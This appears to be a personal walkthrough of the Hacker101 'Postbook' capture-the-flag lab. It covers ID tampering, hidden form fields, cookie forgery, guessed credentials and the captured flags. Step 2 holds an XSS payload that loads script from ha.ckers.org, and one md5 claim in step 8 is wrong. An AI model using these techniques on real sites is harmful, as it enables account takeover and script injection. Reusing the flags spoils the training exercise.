Postbook
--------

From <https://ctf.hacker101.com/ctf> 

Page structure
index.php	
index.php?page=sign_in.php	
index.php?page=sign_up.php	

	1. Create new login and then sign in
		a. http://35.190.155.168:5001/6850b9dbc4/index.php?page=view.php&id=1
		b. Change the id to 2
		c. Get flag 0c651f46282088d5dfca14cd97c8a9c1cbd642469d7c86f10920942b8daed30f

	2. Created new login (signup) with special character from page
		a. This is not allowed based on client side check
		b. But override this by using the API directly e.g. from postman
		c. Successful for userid: <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

	3. Login and edit blog created by admin
		a. Using  manually change the id to 1 e.g. ?page=edit.php&id=1
		b. Get flag 9e10b3ecdacb1e87196552af2369c45f9196d6ca52a3e219148f6ef6fbb8cbf6
		From <http://35.190.155.168:5001/6850b9dbc4/index.php?page=view.php&success=1&id=1&message=^FLAG^9e10b3ecdacb1e87196552af2369c45f9196d6ca52a3e219148f6ef6fbb8cbf6$FLAG$> 
		
	4. In home, there are two hidden fields
		a. Inspect element near "Create Post" button
		b. Change a type from hidden to submit and click on it
		c. Get flag e3e538d85166bbd85359a574c70a40f572e5076a9d91cf8c30a3b977b7c07864
		From <http://35.190.155.168:5001/6850b9dbc4/index.php?page=home.php&message=^FLAG^e3e538d85166bbd85359a574c70a40f572e5076a9d91cf8c30a3b977b7c07864$FLAG$> 
	
	5. Try deleting any page
		a. See the request URL e.g. http://35.190.155.168:5001/6850b9dbc4/index.php?page=delete.php&id=eccbc87e4b5ce2fe28308fd9f2a7baf3
		b. Get the id for hidden post by clicking and check the cookie e.g. Cookie: 
		id=eccbc87e4b5ce2fe28308fd9f2a7baf3
		c. Use this id and directly call the delete request step#a
		d. Get flag fc4ff0e30ae0bee38be1f25570502977f7096953da1fdc6aabf887ec29ff9a04
	
	6. Try random credential
		a. Try user/password
		b. Get flag cc518837e05e28c7bb731e466b8b5d1de47886f926207897afd1caacac3b4446
		From <http://35.190.155.168:5001/959a1a339b/index.php?page=home.php> 
		
	7. There was a hint 189*5
		a. So based on that tried http://35.190.155.168:5001/959a1a339b/index.php?page=view.php&id=945
		b. Get flag e89dbc1fd07d1abb62a7d82ce857328056c142a12d4e546a37e9578813351b1e
		From <http://35.190.155.168:5001/959a1a339b/index.php?page=view.php&id=945> 
		
	8. Notice the new user/blog created
		a. It is created with unique id e.g. user#2/blog#2 has eccbc87e4b5ce2fe28308fd9f2a7baf3
		b. This is md5 encrypted form for digit '2'
		c. Same for other user/blogs.
		d. This gives the ecnrypted md5 for '1' as c4ca4238a0b923820dcc509a6f75849b
		e. Call index.php?page=home.php with cookie id=<as mentioned above>
		f. Get flag 
